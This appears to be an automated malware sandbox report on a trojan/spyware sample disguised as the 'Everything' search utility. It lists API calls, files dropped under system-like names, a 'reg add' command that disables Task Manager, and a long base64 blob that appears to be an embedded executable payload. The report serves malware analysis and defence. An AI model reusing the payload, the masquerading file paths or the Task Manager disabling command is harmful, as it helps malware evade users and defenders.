https://www.voidtools.com/update/)
                                Source: drivEn760.exe, 00000003.00000002.2322582469.0000000002726000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2221996305.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000006.00000000.2219670131.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000007.00000000.2224034477.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000007.00000002.2228700188.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000008.00000000.2226818799.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000002.2246706702.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000000.2244353758.00007FF728D60000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.voidtools.com/update/)InternetReadFileInternetOpenUrlWInternetCloseHandleInternetOpenWwi
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeCode function: 3_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,3_2_00405809
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeWindow created: window name: CLIPBRDWNDCLASS
                                Source: Everything.exe, 00000014.00000003.2331201128.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #_WinAPI_RegisterRawInputDevices.au3memstr_8dac6e87-6

                                System Summary

                                barindex
                                Source: wxl1r0lntg.exe, Program.csBase64 encoded string: System.Security.
                                Source: wxl1r0lntg.exe, Program.csLong String: Length: 3130596
                                Source: wxl1r0lntg.exe, Program.csLong String: Length: 2514464
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CC6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,2_2_00CC6FAA
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D4756B0 OpenSCManagerW,OpenServiceW,ControlService,CloseServiceHandle,OpenServiceW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,GetLastError,CloseServiceHandle,GetLastError,6_2_00007FF63D4756B0
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeCode function: 3_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_00403640
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\0addff5cf70349
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Windows\apppatch\CustomSDB\sihost.exe
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Windows\apppatch\CustomSDB\66fc9ff0ee96c2
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Windows\CbsTemp\0addff5cf70349
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCE2A537B39618441DAC64E34137FF17.TMP
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCE2A537B39618441DAC64E34137FF17.TMP
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CC848E2_2_00CC848E
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CC40FE2_2_00CC40FE
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CD40882_2_00CD4088
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CD00B72_2_00CD00B7
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CE51C92_2_00CE51C9
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CD71532_2_00CD7153
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CD62CA2_2_00CD62CA
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CC32F72_2_00CC32F7
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CD43BF2_2_00CD43BF
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CED4402_2_00CED440
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CCF4612_2_00CCF461
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CCC4262_2_00CCC426
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CD77EF2_2_00CD77EF
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CED8EE2_2_00CED8EE
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CC286B2_2_00CC286B
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CF19F42_2_00CF19F4
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CCE9B72_2_00CCE9B7
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CD6CDC2_2_00CD6CDC
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CD3E0B2_2_00CD3E0B
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CCEFE22_2_00CCEFE2
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CE4F9A2_2_00CE4F9A
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeCode function: 3_2_00406D5F3_2_00406D5F
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D54FD806_2_00007FF63D54FD80
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D47B7B06_2_00007FF63D47B7B0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D520ED06_2_00007FF63D520ED0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D4CE5506_2_00007FF63D4CE550
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D48B8606_2_00007FF63D48B860
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D5E69206_2_00007FF63D5E6920
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D4C79206_2_00007FF63D4C7920
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D4ADF606_2_00007FF63D4ADF60
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D47E8006_2_00007FF63D47E800
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D4847E06_2_00007FF63D4847E0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D61B2606_2_00007FF63D61B260
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D4DC9B06_2_00007FF63D4DC9B0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D5561906_2_00007FF63D556190
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D4829406_2_00007FF63D482940
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D5EF9406_2_00007FF63D5EF940
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D47B2276_2_00007FF63D47B227
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D5F11C06_2_00007FF63D5F11C0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D4B94706_2_00007FF63D4B9470
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D4A24D06_2_00007FF63D4A24D0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D4843906_2_00007FF63D484390
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D48AB706_2_00007FF63D48AB70
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D5F0C106_2_00007FF63D5F0C10
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728C8FD807_2_00007FF728C8FD80
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728BBB7B07_2_00007FF728BBB7B0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728C1C9B07_2_00007FF728C1C9B0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728D311C07_2_00007FF728D311C0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728C961907_2_00007FF728C96190
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728C079207_2_00007FF728C07920
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728D2F9407_2_00007FF728D2F940
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728BC29407_2_00007FF728BC2940
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728D269207_2_00007FF728D26920
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728D5B2607_2_00007FF728D5B260
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728BBB2277_2_00007FF728BBB227
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728D30C107_2_00007FF728D30C10
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728BCAB707_2_00007FF728BCAB70
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728BC43907_2_00007FF728BC4390
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728BE24D07_2_00007FF728BE24D0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728BF94707_2_00007FF728BF9470
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728C0E5507_2_00007FF728C0E550
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728C60ED07_2_00007FF728C60ED0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728BC47E07_2_00007FF728BC47E0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728BBE8007_2_00007FF728BBE800
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728BEDF607_2_00007FF728BEDF60
                                Source: C:\Program Files\Everything\Everything.exeCode function: 7_2_00007FF728BCB8607_2_00007FF728BCB860
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728C8FD8010_2_00007FF728C8FD80
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728BBB7B010_2_00007FF728BBB7B0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728C1C9B010_2_00007FF728C1C9B0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728D311C010_2_00007FF728D311C0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728C9619010_2_00007FF728C96190
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728C0792010_2_00007FF728C07920
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728D2F94010_2_00007FF728D2F940
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728BC294010_2_00007FF728BC2940
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728D2692010_2_00007FF728D26920
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728D5B26010_2_00007FF728D5B260
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728BBB22710_2_00007FF728BBB227
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728D30C1010_2_00007FF728D30C10
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728BCAB7010_2_00007FF728BCAB70
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728BC439010_2_00007FF728BC4390
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728BE24D010_2_00007FF728BE24D0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728BF947010_2_00007FF728BF9470
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728C0E55010_2_00007FF728C0E550
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728C60ED010_2_00007FF728C60ED0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728BC47E010_2_00007FF728BC47E0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728BBE80010_2_00007FF728BBE800
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728BEDF6010_2_00007FF728BEDF60
                                Source: C:\Program Files\Everything\Everything.exeCode function: 10_2_00007FF728BCB86010_2_00007FF728BCB860
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeCode function: 14_2_00007FF848D20D4B14_2_00007FF848D20D4B
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeCode function: 14_2_00007FF848D20E4314_2_00007FF848D20E43
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeCode function: 14_2_00007FF84911A56F14_2_00007FF84911A56F
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeCode function: 14_2_00007FF8491165E014_2_00007FF8491165E0
                                Source: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeCode function: 69_2_00007FF848D00D4B69_2_00007FF848D00D4B
                                Source: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeCode function: 69_2_00007FF848D00E4369_2_00007FF848D00E43
                                Source: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeCode function: 69_2_00007FF848D3140569_2_00007FF848D31405
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeCode function: 70_2_00007FF848D10D4B70_2_00007FF848D10D4B
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeCode function: 70_2_00007FF848D10E4370_2_00007FF848D10E43
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeCode function: 70_2_00007FF848D413D170_2_00007FF848D413D1
                                Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeCode function: 70_2_00007FF848D4140570_2_00007FF848D41405
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeCode function: 73_2_00007FF848D3968D73_2_00007FF848D3968D
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeCode function: 73_2_00007FF848D3140573_2_00007FF848D31405
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeCode function: 73_2_00007FF848D10E8673_2_00007FF848D10E86
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeCode function: 73_2_00007FF848D00D4B73_2_00007FF848D00D4B
                                Source: C:\Windows\apppatch\CustomSDB\sihost.exeCode function: 73_2_00007FF848D00E4373_2_00007FF848D00E43
                                Source: C:\Program Files\Everything\Everything.exeCode function: String function: 00007FF728C63FB0 appears 554 times
                                Source: C:\Program Files\Everything\Everything.exeCode function: String function: 00007FF728C7E010 appears 68 times
                                Source: C:\Program Files\Everything\Everything.exeCode function: String function: 00007FF728BC0B80 appears 134 times
                                Source: C:\Program Files\Everything\Everything.exeCode function: String function: 00007FF728C6DEA0 appears 46 times
                                Source: C:\Program Files\Everything\Everything.exeCode function: String function: 00007FF728D289A0 appears 38 times
                                Source: C:\Program Files\Everything\Everything.exeCode function: String function: 00007FF728D25770 appears 100 times
                                Source: C:\Program Files\Everything\Everything.exeCode function: String function: 00007FF728BBAEB0 appears 36 times
                                Source: C:\Program Files\Everything\Everything.exeCode function: String function: 00007FF728C63FE0 appears 196 times
                                Source: C:\Program Files\Everything\Everything.exeCode function: String function: 00007FF728C792B0 appears 92 times
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: String function: 00CDEC50 appears 56 times
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: String function: 00CDEB78 appears 39 times
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: String function: 00CDF5F0 appears 31 times
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: String function: 00007FF63D5E5770 appears 50 times
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: String function: 00007FF63D5392B0 appears 46 times
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: String function: 00007FF63D53E010 appears 34 times
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: String function: 00007FF63D523FB0 appears 277 times
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: String function: 00007FF63D523FE0 appears 98 times
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: String function: 00007FF63D480B80 appears 67 times
                                Source: wxl1r0lntg.exe, 00000000.00000000.2029727081.00000000015D8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEverything-1.4.1..exe4 vs wxl1r0lntg.exe
                                Source: wxl1r0lntg.exe, 00000000.00000002.2052298255.00000000145C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs wxl1r0lntg.exe
                                Source: wxl1r0lntg.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                Source: containerwebruntime.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe.14.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: RuntimeBroker.exe.14.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, jCpXp0jZveeo1HIj1OD.csCryptographic APIs: 'CreateDecryptor'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, jCpXp0jZveeo1HIj1OD.csCryptographic APIs: 'CreateDecryptor'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, jCpXp0jZveeo1HIj1OD.csCryptographic APIs: 'CreateDecryptor'
                                Source: 0.2.wxl1r0lntg.exe.146dbdbd.2.raw.unpack, jCpXp0jZveeo1HIj1OD.csCryptographic APIs: 'CreateDecryptor'
                                Source: wxl1r0lntg.exe, Program.csBase64 encoded string: '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
                                Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@116/168@1/2
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CC6C74 GetLastError,FormatMessageW,2_2_00CC6C74
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeCode function: 3_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_00403640
